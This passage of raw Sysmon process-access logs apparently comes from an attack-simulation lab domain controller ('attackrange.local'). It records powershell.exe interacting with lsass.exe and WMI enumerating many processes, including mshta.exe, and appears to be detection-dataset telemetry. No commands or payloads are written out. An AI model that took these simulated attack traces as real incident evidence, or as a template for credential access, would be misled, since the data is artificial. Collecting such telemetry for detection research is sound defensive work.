16:04:53.075{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-54A4-6008-CB06-00000000A301}1100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030053Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.075{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-54A4-6008-CB06-00000000A301}1100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030052Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.028{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-54A4-6008-CB06-00000000A301}1100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030051Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:53.028{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-54A4-6008-CB06-00000000A301}1100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000030050Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.997{7901BC46-54A4-6008-CB06-00000000A301}1100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_f421ntzh.53l.ps12021-01-20 16:04:52.997 10341000x800000000000000030164Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.153{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-54A4-6008-CC06-00000000A301}1524C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030163Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.153{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-54A4-6008-CB06-00000000A301}1100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030162Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.153{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-54A4-6008-CA06-00000000A301}4472C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030161Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.153{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030160Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.153{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030159Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.153{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030158Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.153{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030157Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.153{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030156Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.153{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030155Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.153{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030154Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.153{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030153Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.153{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030152Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.153{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030151Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.153{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030150Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.153{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030149Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.153{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030148Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030147Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:54.137{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program 